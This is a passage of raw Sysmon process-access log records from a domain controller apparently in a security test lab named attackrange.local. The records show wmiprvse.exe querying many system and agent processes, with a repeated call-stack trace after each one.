Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.425{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 